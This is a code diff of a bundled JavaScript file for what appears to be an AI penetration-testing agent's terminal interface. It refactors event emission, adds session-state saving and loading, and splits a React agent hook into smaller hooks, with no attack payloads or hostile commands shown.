+      state.addMissionChecklistItems(snapshot.missionChecklist.map((c) => c.text));
+    }
+    return true;
+  } catch (err) {
+    console.warn(`[StatePersistence] Failed to load state: ${err}`);
+    return false;
+  }
+}
 
 // src/agents/core-agent.ts
 var CoreAgent = class _CoreAgent {
@@ -6882,6 +7081,34 @@ Please decide how to handle this error and continue.`;
       }
     });
   }
+  /** Emit tool call event for TUI tracking */
+  emitToolCall(toolName, input) {
+    this.events.emit({
+      type: EVENT_TYPES.TOOL_CALL,
+      timestamp: Date.now(),
+      data: {
+        toolName,
+        input,
+        approvalLevel: APPROVAL_LEVELS.AUTO,
+        needsApproval: false
+      }
+    });
+  }
+  /** Emit tool result event for TUI tracking */
+  emitToolResult(toolName, success, output, error, duration) {
+    this.events.emit({
+      type: EVENT_TYPES.TOOL_RESULT,
+      timestamp: Date.now(),
+      data: {
+        toolName,
+        success,
+        output,
+        outputSummary: output.slice(0, 200),
+        error,
+        duration
+      }
+    });
+  }
   // ─────────────────────────────────────────────────────────────────
   // SUBSECTION: Tool Processing
   // ─────────────────────────────────────────────────────────────────
@@ -6941,16 +7168,7 @@ Please decide how to handle this error and continue.`;
   /** Execute tool calls in parallel via Promise.allSettled */
   async executeToolCallsInParallel(toolCalls, progress) {
     for (const call of toolCalls) {
-      this.events.emit({
-        type: EVENT_TYPES.TOOL_CALL,
-        timestamp: Date.now(),
-        data: {
-          toolName: call.name,
-          input: call.input,
-          approvalLevel: APPROVAL_LEVELS.AUTO,
-          needsApproval: false
-        }
-      });
+      this.emitToolCall(call.name, call.input);
     }
     const promises = toolCalls.map((call) => this.executeSingleTool(call, progress));
     const settled = await Promise.allSettled(promises);
@@ -6963,17 +7181,8 @@ Please decide how to handle this error and continue.`;
   /** Execute tool calls sequentially */
   async executeToolCallsSequentially(toolCalls, progress) {
     const results = [];
-    for (const call of toolCalls) {
-      this.events.emit({
-        type: EVENT_TYPES.TOOL_CALL,
-        timestamp: Date.now(),
-        data: {
-          toolName: call.name,
-          input: call.input,
-          approvalLevel: APPROVAL_LEVELS.AUTO,
-          needsApproval: false
-        }
-      });
+    for (const call of toolCalls) {
+      this.emitToolCall(call.name, call.input);
       const result2 = await this.executeSingleTool(call, progress);
       results.push(result2);
     }
@@ -7013,35 +7222,13 @@ Please decide how to handle this error and continue.`;
           progress.blockedCommandPatterns.clear();
         }
       }
-      this.events.emit({
-        type: EVENT_TYPES.TOOL_RESULT,
-        timestamp: Date.now(),
-        data: {
-          toolName: call.name,
-          success: result2.success,
-          output: outputText,
-          outputSummary: outputText.slice(0, 200),
-          error: result2.error,
-          duration: Date.now() - toolStartTime
-        }
-      });
+      this.emitToolResult(call.name, result2.success, outputText, result2.error, Date.now() - toolStartTime);
       return { toolCallId: call.id, output: outputText, error: result2.error };
     } catch (error) {
       const errorMsg = String(error);
       const enrichedError = this.enrichToolErrorContext({ toolName: call.name, input: call.input, error: errorMsg, originalOutput: "", progress });
       if (progress) progress.toolErrors++;
-      this.events.emit({
-        type: EVENT_TYPES.TOOL_RESULT,
-        timestamp: Date.now(),
-        data: {
-          toolName: call.name,
-          success: false,
-          output: enrichedError,
-          outputSummary: enrichedError.slice(0, 200),
-          error: errorMsg,
-          duration: Date.now() - toolStartTime
-        }
-      });
+      this.emitToolResult(call.name, false, enrichedError, errorMsg, Date.now() - toolStartTime);
       return { toolCallId: call.id, output: enrichedError, error: errorMsg };
     }
   }
@@ -7140,9 +7327,9 @@ Please decide how to handle this error and continue.`;
 };
 
 // src/agents/prompt-builder.ts
-import { readFileSync as readFileSync3, existsSync as existsSync5 } from "fs";
-import { join as join6, dirname as dirname4 } from "path";
-import { fileURLToPath as fileURLToPath4 } from "url";
+import { readFileSync as readFileSync4, existsSync as existsSync6 } from "fs";
+import { join as join9, dirname as dirname5 } from "path";
+import { fileURLToPath as fileURLToPath5 } from "url";
 
 // src/shared/constants/prompts.ts
 var PROMPT_PATHS = {
@@ -7195,9 +7382,9 @@ var INITIAL_TASKS = {
 };
 
 // src/agents/prompt-builder.ts
-var __dirname4 = dirname4(fileURLToPath4(import.meta.url));
-var PROMPTS_DIR = join6(__dirname4, "prompts");
-var TECHNIQUES_DIR = join6(PROMPTS_DIR, PROMPT_PATHS.TECHNIQUES_DIR);
+var __dirname5 = dirname5(fileURLToPath5(import.meta.url));
+var PROMPTS_DIR = join9(__dirname5, "prompts");
+var TECHNIQUES_DIR = join9(PROMPTS_DIR, PROMPT_PATHS.TECHNIQUES_DIR);
 var { AGENT_FILES } = PROMPT_PATHS;
 var PHASE_PROMPT_MAP = {
   // Direct mappings — phase has its own prompt file
@@ -7273,8 +7460,8 @@ var PromptBuilder = class {
    * Load a prompt file from src/agents/prompts/
    */
   loadPromptFile(filename) {
-    const path2 = join6(PROMPTS_DIR, filename);
-    return existsSync5(path2) ? readFileSync3(path2, PROMPT_CONFIG.ENCODING) : "";
+    const path3 = join9(PROMPTS_DIR, filename);
+    return existsSync6(path3) ? readFileSync4(path3, PROMPT_CONFIG.ENCODING) : "";
   }
   /**
    * Load phase-specific prompt.
@@ -7317,15 +7504,15 @@ ${content}
    * use web_search to look up specific attack techniques on demand.
    */
   loadPhaseRelevantTechniques(phase) {
-    if (!existsSync5(TECHNIQUES_DIR)) return "";
+    if (!existsSync6(TECHNIQUES_DIR)) return "";
     const relevantTechniques = PHASE_TECHNIQUE_MAP[phase] || [];
     if (relevantTechniques.length === 0) return "";
     const fragments = [];
     for (const technique of relevantTechniques) {
-      const filePath = join6(TECHNIQUES_DIR, `${technique}.md`);
+      const filePath = join9(TECHNIQUES_DIR, `${technique}.md`);
       try {
-        if (!existsSync5(filePath)) continue;
-        const content = readFileSync3(filePath, PROMPT_CONFIG.ENCODING);
+        if (!existsSync6(filePath)) continue;
+        const content = readFileSync4(filePath, PROMPT_CONFIG.ENCODING);
         if (content) {
           fragments.push(`<technique-reference category="${technique}">
 ${content}
@@ -7381,6 +7568,10 @@ var MainAgent = class extends CoreAgent {
       const result2 = await this.run(userInput, this.getCurrentPrompt());
       return result2.output;
     } finally {
+      try {
+        saveState(this.state);
+      } catch {
+      }
       await cleanupAllProcesses();
     }
   }
@@ -7399,10 +7590,28 @@ var MainAgent = class extends CoreAgent {
   }
   // ─── Internal Helpers ────────────────────────────────────────
   initializeTask() {
+    try {
+      ensureDirExists(WORKSPACE.ROOT);
+    } catch {
+    }
     if (this.state.getTodo().length === 0) {
       this.state.addTodo(INITIAL_TASKS.RECON, PRIORITIES.HIGH);
     }
   }
+  /**
+   * Load previous session state from .pentesting/sessions/latest.json
+   * @returns true if a previous session was restored
+   */
+  loadPreviousSession() {
+    return loadState(this.state);
+  }
+  /**
+   * Manually save current state to .pentesting/sessions/
+   * @returns Path to the saved session file
+   */
+  saveCurrentState() {
+    return saveState(this.state);
+  }
   getCurrentPrompt() {
     const phase = this.state.getPhase() || PHASES.RECON;
     return this.promptBuilder.build(this.userInput, phase);
@@ -7469,10 +7678,10 @@ var AgentFactory = class {
    * Architecture: Single agent with all tools.
    * No sub-agents, no spawn_sub, no nested loops.
    */
-  static createMainAgent(autoApprove = false) {
+  static createMainAgent(shouldAutoApprove = false) {
     const state = new SharedState();
     const events = new AgentEventEmitter();
-    const approvalGate = new ApprovalGate(autoApprove);
+    const approvalGate = new ApprovalGate(shouldAutoApprove);
     const scopeGuard = new ScopeGuard(state);
     const toolRegistry = new CategorizedToolRegistry(
       state,
@@ -7484,6 +7693,54 @@ var AgentFactory = class {
   }
 };
 
+// src/platform/tui/utils/format.ts
+var formatDuration = (ms) => {
+  const totalSec = ms / 1e3;
+  if (totalSec < 60) return `${totalSec.toFixed(1)}s`;
+  const minutes = Math.floor(totalSec / 60);
+  const seconds = Math.floor(totalSec % 60);
+  return `${minutes}m ${seconds}s`;
+};
+var formatTokens = (count) => {
+  if (count >= 1e6) return (count / 1e6).toFixed(1) + "M";
+  if (count >= 1e3) return (count / 1e3).toFixed(1) + "K";
+  return String(count);
+};
+var formatMeta = (ms, tokens) => {
+  const parts = [];
+  if (ms > 0) parts.push(formatDuration(ms));
+  if (tokens > 0) parts.push(`\u2191 ${formatTokens(tokens)} tokens`);
+  return parts.length > 0 ? `(${parts.join(" \xB7 ")})` : "";
+};
+var formatInlineStatus = () => {
+  const zombieHunter2 = new ZombieHunter();
+  const healthMonitor2 = new HealthMonitor();
+  const processes = listBackgroundProcesses();
+  const zombies = zombieHunter2.scan();
+  const health = healthMonitor2.check();
+  const statusData = {
+    processes: processes.map((p) => ({
+      id: p.id,
+      role: p.role,
+      description: p.description,
+      purpose: p.purpose,
+      running: p.isRunning,
+      durationMs: p.durationMs,
+      listeningPort: p.listeningPort,
+      exitCode: p.exitCode
+    })),
+    zombies: zombies.map((z) => ({
+      processId: z.processId,
+      orphanedChildren: z.orphanedChildren
+    })),
+    health: health.overall
+  };
+  return JSON.stringify(statusData);
+};
+
+// src/platform/tui/hooks/useAgentState.ts
+import { useState, useRef, useCallback } from "react";
+
 // src/shared/constants/thought.ts
 var THOUGHT_TYPE = {
   THINKING: "thinking",
@@ -7742,53 +7999,8 @@ var HELP_TEXT = `
 /auto            (toggle approval mode)
 `;
 
-// src/platform/tui/utils/format.ts
-var formatDuration = (ms) => {
-  const totalSec = ms / 1e3;
-  if (totalSec < 60) return `${totalSec.toFixed(1)}s`;
-  const minutes = Math.floor(totalSec / 60);
-  const seconds = Math.floor(totalSec % 60);
-  return `${minutes}m ${seconds}s`;
-};
-var formatTokens = (count) => {
-  if (count >= 1e6) return (count / 1e6).toFixed(1) + "M";
-  if (count >= 1e3) return (count / 1e3).toFixed(1) + "K";
-  return String(count);
-};
-var formatMeta = (ms, tokens) => {
-  const parts = [];
-  if (ms > 0) parts.push(formatDuration(ms));
-  if (tokens > 0) parts.push(`\u2191 ${formatTokens(tokens)} tokens`);
-  return parts.length > 0 ? `(${parts.join(" \xB7 ")})` : "";
-};
-var formatInlineStatus = () => {
-  const zombieHunter2 = new ZombieHunter();
-  const healthMonitor2 = new HealthMonitor();
-  const processes = listBackgroundProcesses();
-  const zombies = zombieHunter2.scan();
-  const health = healthMonitor2.check();
-  const statusData = {
-    processes: processes.map((p) => ({
-      id: p.id,
-      role: p.role,
-      description: p.description,
-      purpose: p.purpose,
-      running: p.isRunning,
-      durationMs: p.durationMs,
-      listeningPort: p.listeningPort,
-      exitCode: p.exitCode
-    })),
-    zombies: zombies.map((z) => ({
-      processId: z.processId,
-      orphanedChildren: z.orphanedChildren
-    })),
-    health: health.overall
-  };
-  return JSON.stringify(statusData);
-};
-
-// src/platform/tui/hooks/useAgent.ts
-var useAgent = (autoApprove, target) => {
+// src/platform/tui/hooks/useAgentState.ts
+var useAgentState = () => {
   const [messages, setMessages] = useState([]);
   const [isProcessing, setIsProcessing] = useState(false);
   const [currentStatus, setCurrentStatus] = useState("");
@@ -7816,14 +8028,6 @@ var useAgent = (autoApprove, target) => {
   const retryCountRef = useRef(0);
   const tokenAccumRef = useRef(0);
   const lastStepTokensRef = useRef(0);
-  const [agent] = useState(() => AgentFactory.createMainAgent(autoApprove));
-  useEffect(() => {
-    if (target) {
-      agent.addTarget(target);
-      agent.setScope([target]);
-    }
-  }, [agent, target]);
-  const eventsRef = useRef(agent.getEventEmitter());
   const addMessage = useCallback((type, content) => {
     const id = Math.random().toString(36).substring(7);
     setMessages((prev) => [...prev, { id, type, content, timestamp: /* @__PURE__ */ new Date() }]);
@@ -7847,56 +8051,63 @@ var useAgent = (autoApprove, target) => {
       setElapsedTime(0);
     }
   }, []);
-  const executeTask = useCallback(async (task) => {
-    setIsProcessing(true);
-    manageTimer("start");
-    setCurrentStatus("Thinking");
-    resetCumulativeCounters();
-    try {
-      const response = await agent.execute(task);
-      const meta = lastResponseMetaRef.current;
-      const suffix = meta ? ` ${formatMeta(meta.durationMs || 0, (meta.tokens?.input || 0) + (meta.tokens?.output || 0))}` : "";
-      addMessage("ai", response + suffix);
-    } catch (e) {
-      addMessage("error", e instanceof Error ? e.message : String(e));
-    } finally {
-      manageTimer("stop");
-      setIsProcessing(false);
-      setCurrentStatus("");
-    }
-  }, [agent, addMessage, manageTimer, resetCumulativeCounters]);
-  const abort = useCallback(() => {
-    agent.abort();
-    setIsProcessing(false);
-    manageTimer("stop");
-    setCurrentStatus("");
-    addMessage("system", "Interrupted");
-  }, [agent, addMessage, manageTimer]);
-  const cancelInputRequest = useCallback(() => {
-    if (inputRequest.isActive && inputRequest.resolve) {
-      inputRequest.resolve(null);
-      setInputRequest({ isActive: false, prompt: "", isPassword: false, resolve: null });
-      addMessage("system", "Input cancelled");
-    }
-  }, [inputRequest, addMessage]);
+  const clearAllTimers = useCallback(() => {
+    if (timerRef.current) clearInterval(timerRef.current);
+    if (retryCountdownRef.current) clearInterval(retryCountdownRef.current);
+  }, []);
+  return {
+    // State
+    messages,
+    setMessages,
+    isProcessing,
+    setIsProcessing,
+    currentStatus,
+    setCurrentStatus,
+    elapsedTime,
+    retryState,
+    setRetryState,
+    currentTokens,
+    setCurrentTokens,
+    inputRequest,
+    setInputRequest,
+    stats,
+    setStats,
+    // Refs
+    lastResponseMetaRef,
+    timerRef,
+    retryCountdownRef,
+    retryCountRef,
+    tokenAccumRef,
+    lastStepTokensRef,
+    // Helpers
+    addMessage,
+    resetCumulativeCounters,
+    manageTimer,
+    clearAllTimers
+  };
+};
+
+// src/platform/tui/hooks/useAgentEvents.ts
+import { useEffect } from "react";
+var useAgentEvents = (agent, eventsRef, state) => {
+  const {
+    addMessage,
+    setCurrentStatus,
+    setRetryState,
+    setCurrentTokens,
+    setStats,
+    lastResponseMetaRef,
+    retryCountdownRef,
+    retryCountRef,
+    tokenAccumRef,
+    lastStepTokensRef,
+    clearAllTimers
+  } = state;
   useEffect(() => {
     const events = eventsRef.current;
     const onToolCall = (e) => {
       setCurrentStatus(`Executing: ${e.data.toolName}`);
-      let inputStr = "";
-      try {
-        if (e.data.input && Object.keys(e.data.input).length > 0) {
-          if (e.data.toolName === TOOL_NAMES.RUN_CMD && e.data.input.command) {
-            inputStr = String(e.data.input.command);
-          } else {
-            const str = JSON.stringify(e.data.input);
-            if (str !== "{}") {
-              inputStr = str.length > TUI_DISPLAY_LIMITS.toolInputPreview ? str.substring(0, TUI_DISPLAY_LIMITS.toolInputTruncated) + "..." : str;
-            }
-          }
-        }
-      } catch {
-      }
+      const inputStr = formatToolInput(e.data.toolName, e.data.input);
       addMessage("tool", inputStr ? `${e.data.toolName} ${inputStr}` : e.data.toolName);
     };
     const onToolResult = (e) => {
@@ -7912,96 +8123,73 @@ var useAgent = (autoApprove, target) => {
       lastResponseMetaRef.current = { durationMs: e.data.durationMs, tokens: e.data.tokens };
     };
     const onRetry = (e) => {
-      const delaySec = Math.ceil(e.data.delayMs / 1e3);
-      retryCountRef.current += 1;
-      const retryNum = retryCountRef.current;
-      addMessage("system", `\u27F3 Retry #${retryNum} \xB7 ${e.data.error} \xB7 waiting ${delaySec}s...`);
-      setRetryState({ isRetrying: true, attempt: retryNum, maxRetries: e.data.maxRetries, delayMs: e.data.delayMs, error: e.data.error, countdown: delaySec });
-      if (retryCountdownRef.current) clearInterval(retryCountdownRef.current);
-      let remaining = delaySec;
-      retryCountdownRef.current = setInterval(() => {
-        remaining -= 1;
-        if (remaining <= 0) {
-          setRetryState((prev) => ({ ...prev, isRetrying: false, countdown: 0 }));
-          if (retryCountdownRef.current) clearInterval(retryCountdownRef.current);
-        } else {
-          setRetryState((prev) => ({ ...prev, countdown: remaining }));
-        }
-      }, 1e3);
+      handleRetry(e, addMessage, setRetryState, retryCountdownRef, retryCountRef);
+    };
+    const onThink = (e) => {
+      const t = e.data.thought;
+      setCurrentStatus(t.length > TUI_DISPLAY_LIMITS.statusThoughtPreview ? t.substring(0, TUI_DISPLAY_LIMITS.statusThoughtTruncated) + "..." : t);
+    };
+    const onError = (e) => {
+      addMessage("error", e.data.message || "An error occurred");
     };
     const onUsageUpdate = (e) => {
       const stepTokens = e.data.inputTokens + e.data.outputTokens;
-      if (stepTokens < lastStepTokensRef.current) tokenAccumRef.current += lastStepTokensRef.current;
+      if (stepTokens < lastStepTokensRef.current) {
+        tokenAccumRef.current += lastStepTokensRef.current;
+      }
       lastStepTokensRef.current = stepTokens;
       setCurrentTokens(tokenAccumRef.current + stepTokens);
     };
     setInputHandler((p) => {
-      return new Promise((resolve) => setInputRequest({
-        isActive: true,
-        prompt: p.trim(),
-        isPassword: /password|passphrase/i.test(p),
-        inputType: /sudo/i.test(p) ? "sudo_password" : /password|passphrase/i.test(p) ? "password" : "text",
-        resolve
-      }));
+      return new Promise((resolve) => {
+        const isPassword = /password|passphrase/i.test(p);
+        const inputType = /sudo/i.test(p) ? "sudo_password" : isPassword ? "password" : "text";
+        state.setInputRequest({
+          isActive: true,
+          prompt: p.trim(),
+          isPassword,
+          inputType,
+          resolve
+        });
+      });
     });
     setCredentialHandler((request) => {
       return new Promise((resolve) => {
         const hiddenTypes = ["password", "sudo_password", "ssh_password", "passphrase", "api_key", "credential"];
         const isPassword = hiddenTypes.includes(request.type);
-        let displayPrompt = request.prompt || "Enter input";
-        if (request.context) {
-          displayPrompt = `${displayPrompt}
-Context: ${request.context}`;
-        }
-        if (request.optional) {
-          displayPrompt += " (optional - press Enter to skip)";
-        }
-        if (request.options && request.options.length > 0) {
-          displayPrompt += `
-Options: ${request.options.join(", ")}`;
-        }
-        setInputRequest({
+        const displayPrompt = buildCredentialPrompt(request);
+        state.setInputRequest({
           isActive: true,
           prompt: displayPrompt,
           isPassword,
           inputType: request.type,
           context: request.context,
-          optional: request.optional,
+          optional: request.isOptional,
           options: request.options,
           resolve
         });
       });
     });
     setCommandEventEmitter((event) => {
-      const icons = {
-        [COMMAND_EVENT_TYPES.TOOL_MISSING]: "\u26A0\uFE0F",
-        [COMMAND_EVENT_TYPES.TOOL_INSTALL]: "\u{1F4E6}",
-        [COMMAND_EVENT_TYPES.TOOL_INSTALLED]: "\u2705",
-        [COMMAND_EVENT_TYPES.TOOL_INSTALL_FAILED]: "\u274C",
-        [COMMAND_EVENT_TYPES.TOOL_RETRY]: "\u{1F504}",
-        [COMMAND_EVENT_TYPES.COMMAND_START]: "\u25B6",
-        [COMMAND_EVENT_TYPES.COMMAND_SUCCESS]: "\u2713",
-        [COMMAND_EVENT_TYPES.COMMAND_FAILED]: "\u2717",
-        [COMMAND_EVENT_TYPES.COMMAND_ERROR]: "\u274C",
-        [COMMAND_EVENT_TYPES.INPUT_REQUIRED]: "\u{1F510}"
-      };
-      const icon = icons[event.type] || "\u2022";
+      const icon = getCommandEventIcon(event.type);
       const msg = event.detail ? `${icon} ${event.message}
    ${event.detail}` : `${icon} ${event.message}`;
       addMessage("system", msg);
     });
     const updateStats = () => {
       const s = agent.getState();
-      setStats({ phase: agent.getPhase(), targets: s.getTargets().size, findings: s.getFindings().length, todo: s.getTodo().length });
+      setStats({
+        phase: agent.getPhase(),
+        targets: s.getTargets().size,
+        findings: s.getFindings().length,
+        todo: s.getTodo().length
+      });
     };
     events.on(EVENT_TYPES.TOOL_CALL, onToolCall);
     events.on(EVENT_TYPES.TOOL_RESULT, onToolResult);
-    events.on(EVENT_TYPES.THINK, (e) => {
-      const t = e.data.thought;
-      setCurrentStatus(t.length > TUI_DISPLAY_LIMITS.statusThoughtPreview ? t.substring(0, TUI_DISPLAY_LIMITS.statusThoughtTruncated) + "..." : t);
-    });
+    events.on(EVENT_TYPES.THINK, onThink);
     events.on(EVENT_TYPES.COMPLETE, onComplete);
-    events.on(EVENT_TYPES.ERROR, (e) => addMessage("error", e.data.message || "An error occurred"));
+    events.on(EVENT_TYPES.ERROR, onError);
     events.on(EVENT_TYPES.RETRY, onRetry);
     events.on(EVENT_TYPES.USAGE_UPDATE, onUsageUpdate);
     events.on(EVENT_TYPES.STATE_CHANGE, updateStats);
@@ -8009,10 +8197,154 @@ Options: ${request.options.join(", ")}`;
     updateStats();
     return () => {
       events.removeAllListeners();
-      if (timerRef.current) clearInterval(timerRef.current);
-      if (retryCountdownRef.current) clearInterval(retryCountdownRef.current);
+      clearAllTimers();
     };
-  }, [agent, addMessage]);
+  }, [
+    agent,
+    addMessage,
+    setCurrentStatus,
+    setRetryState,
+    setCurrentTokens,
+    setStats,
+    lastResponseMetaRef,
+    retryCountdownRef,
+    retryCountRef,
+    tokenAccumRef,
+    lastStepTokensRef,
+    clearAllTimers,
+    state
+  ]);
+};
+function formatToolInput(toolName, input) {
+  if (!input || Object.keys(input).length === 0) return "";
+  try {
+    if (toolName === TOOL_NAMES.RUN_CMD && input.command) {
+      return String(input.command);
+    }
+    const str = JSON.stringify(input);
+    if (str === "{}") return "";
+    return str.length > TUI_DISPLAY_LIMITS.toolInputPreview ? str.substring(0, TUI_DISPLAY_LIMITS.toolInputTruncated) + "..." : str;
+  } catch {
+    return "";
+  }
+}
+function handleRetry(e, addMessage, setRetryState, retryCountdownRef, retryCountRef) {
+  const delaySec = Math.ceil(e.data.delayMs / 1e3);
+  retryCountRef.current += 1;
+  const retryNum = retryCountRef.current;
+  addMessage("system", `\u27F3 Retry #${retryNum} \xB7 ${e.data.error} \xB7 waiting ${delaySec}s...`);
+  setRetryState({
+    isRetrying: true,
+    attempt: retryNum,
+    maxRetries: e.data.maxRetries,
+    delayMs: e.data.delayMs,
+    error: e.data.error,
+    countdown: delaySec
+  });
+  if (retryCountdownRef.current) clearInterval(retryCountdownRef.current);
+  let remaining = delaySec;
+  retryCountdownRef.current = setInterval(() => {
+    remaining -= 1;
+    if (remaining <= 0) {
+      setRetryState((prev) => ({ ...prev, isRetrying: false, countdown: 0 }));
+      if (retryCountdownRef.current) clearInterval(retryCountdownRef.current);
+    } else {
+      setRetryState((prev) => ({ ...prev, countdown: remaining }));
+    }
+  }, 1e3);
+}
+function buildCredentialPrompt(request) {
+  let displayPrompt = request.prompt || "Enter input";
+  if (request.context) {
+    displayPrompt = `${displayPrompt}
+Context: ${request.context}`;
+  }
+  if (request.isOptional) {
+    displayPrompt += " (optional - press Enter to skip)";
+  }
+  if (request.options && request.options.length > 0) {
+    displayPrompt += `
+Options: ${request.options.join(", ")}`;
+  }
+  return displayPrompt;
+}
+function getCommandEventIcon(eventType) {
+  const icons = {
+    [COMMAND_EVENT_TYPES.TOOL_MISSING]: "\u26A0\uFE0F",
+    [COMMAND_EVENT_TYPES.TOOL_INSTALL]: "\u{1F4E6}",
+    [COMMAND_EVENT_TYPES.TOOL_INSTALLED]: "\u2705",
+    [COMMAND_EVENT_TYPES.TOOL_INSTALL_FAILED]: "\u274C",
+    [COMMAND_EVENT_TYPES.TOOL_RETRY]: "\u{1F504}",
+    [COMMAND_EVENT_TYPES.COMMAND_START]: "\u25B6",
+    [COMMAND_EVENT_TYPES.COMMAND_SUCCESS]: "\u2713",
+    [COMMAND_EVENT_TYPES.COMMAND_FAILED]: "\u2717",
+    [COMMAND_EVENT_TYPES.COMMAND_ERROR]: "\u274C",
+    [COMMAND_EVENT_TYPES.INPUT_REQUIRED]: "\u{1F510}"
+  };
+  return icons[eventType] || "\u2022";
+}
+
+// src/platform/tui/hooks/useAgent.ts
+var useAgent = (shouldAutoApprove, target) => {
+  const [agent] = useState2(() => AgentFactory.createMainAgent(shouldAutoApprove));
+  const eventsRef = useRef2(agent.getEventEmitter());
+  const state = useAgentState();
+  const {
+    messages,
+    setMessages,
+    isProcessing,
+    setIsProcessing,
+    currentStatus,
+    elapsedTime,
+    retryState,
+    currentTokens,
+    inputRequest,
+    setInputRequest,
+    stats,
+    lastResponseMetaRef,
+    addMessage,
+    manageTimer,
+    resetCumulativeCounters
+  } = state;
+  useEffect2(() => {
+    if (target) {
+      agent.addTarget(target);
+      agent.setScope([target]);
+    }
+  }, [agent, target]);
+  useAgentEvents(agent, eventsRef, state);
+  const executeTask = useCallback2(async (task) => {
+    setIsProcessing(true);
+    manageTimer("start");
+    state.setCurrentStatus("Thinking");
+    resetCumulativeCounters();
+    try {
+      const response = await agent.execute(task);
+      const meta = lastResponseMetaRef.current;
+      const suffix = meta ? ` ${formatMeta(meta.durationMs || 0, (meta.tokens?.input || 0) + (meta.tokens?.output || 0))}` : "";
+      addMessage("ai", response + suffix);
+    } catch (e) {
+      addMessage("error", e instanceof Error ? e.message : String(e));
+    } finally {
+      manageTimer("stop");
+      setIsProcessing(false);
+      state.setCurrentStatus("");
+    }
+  }, [agent, addMessage, manageTimer, resetCumulativeCounters, setIsProcessing, lastResponseMetaRef, state]);
+  const abort = useCallback2(() => {
+    agent.abort();
+    setIsProcessing(false);
+    manageTimer("stop");
+    state.setCurrentStatus("");
+    addMessage("system", "Interrupted");
+  }, [agent, addMessage, manageTimer, setIsProcessing, state]);
+  const cancelInputRequest = useCallback2(() => {
+    if (inputRequest.isActive && inputRequest.resolve) {
+      inputRequest.resolve(null);
+      setInputRequest({ isActive: false, prompt: "", isPassword: false, resolve: null });
+      addMessage("system", "Input cancelled");
+    }
+  }, [inputRequest, setInputRequest, addMessage]);
   return {
     agent,
     messages,
@@ -8222,14 +8554,14 @@ var MessageList = ({ messages }) => {
 import { Box as Box3, Text as Text4 } from "ink";
 
 // src/platform/tui/components/MusicSpinner.tsx
-import { useState as useState2, useEffect as useEffect2 } from "react";
+import { useState as useState3, useEffect as useEffect3 } from "react";
 import { Text as Text3 } from "ink";
 import { jsx as jsx3 } from "react/jsx-runtime";
 var FRAMES = ["\u2669", "\u266A", "\u266B", "\u266C", "\u266B", "\u266A"];
 var INTERVAL = 150;
 var MusicSpinner = ({ color }) => {
-  const [index, setIndex] = useState2(0);
-  useEffect2(() => {
+  const [index, setIndex] = useState3(0);
+  useEffect3(() => {
     const timer = setInterval(() => {
       setIndex((i) => (i + 1) % FRAMES.length);
     }, INTERVAL);
@@ -8388,9 +8720,9 @@ var footer_default = Footer;
 import { jsx as jsx7, jsxs as jsxs6 } from "react/jsx-runtime";
 var App = ({ autoApprove = false, target }) => {
   const { exit } = useApp();
-  const [input, setInput] = useState3("");
-  const [secretInput, setSecretInput] = useState3("");
-  const [autoApproveMode, setAutoApproveMode] = useState3(autoApprove);
+  const [input, setInput] = useState4("");
+  const [secretInput, setSecretInput] = useState4("");
+  const [autoApproveMode, setAutoApproveMode] = useState4(autoApprove);
   const {
     agent,
     messages,
@@ -8408,14 +8740,14 @@ var App = ({ autoApprove = false, target }) => {
     cancelInputRequest,
     addMessage
   } = useAgent(autoApproveMode, target);
-  const handleExit = useCallback2(() => {
+  const handleExit = useCallback3(() => {
     if (inputRequest.isActive && inputRequest.resolve) inputRequest.resolve(null);
     cleanupAllProcesses().catch(() => {
     });
     exit();
     setTimeout(() => process.exit(0), DISPLAY_LIMITS.EXIT_DELAY);
   }, [exit, inputRequest, cancelInputRequest]);
-  const handleCommand = useCallback2(async (cmd, args) => {
+  const handleCommand = useCallback3(async (cmd, args) => {
     switch (cmd) {
       case UI_COMMANDS.HELP:
       case UI_COMMANDS.HELP_SHORT:
@@ -8497,7 +8829,7 @@ ${procData.stdout || "(no output)"}
         addMessage("error", `Unknown command: /${cmd}`);
     }
   }, [agent, addMessage, executeTask, setMessages, handleExit, autoApproveMode]);
-  const handleSubmit = useCallback2(async (value) => {
+  const handleSubmit = useCallback3(async (value) => {
     const trimmed = value.trim();
     if (!trimmed) return;
     setInput("");
@@ -8509,7 +8841,7 @@ ${procData.stdout || "(no output)"}
       await executeTask(trimmed);
     }
   }, [addMessage, executeTask, handleCommand]);
-  const handleSecretSubmit = useCallback2((value) => {
+  const handleSecretSubmit = useCallback3((value) => {
     if (!inputRequest.isActive || !inputRequest.resolve) return;
     const displayText = inputRequest.isPassword ? "\u2022".repeat(value.length) : value;
     const promptLabel = inputRequest.prompt || "Input";
@@ -8525,7 +8857,7 @@ ${procData.stdout || "(no output)"}
     }
     if (key.ctrl && ch === "c") handleExit();
   });
-  useEffect3(() => {
+  useEffect4(() => {
     const onSignal = () => handleExit();
     process.on("SIGINT", onSignal);
     process.on("SIGTERM", onSignal);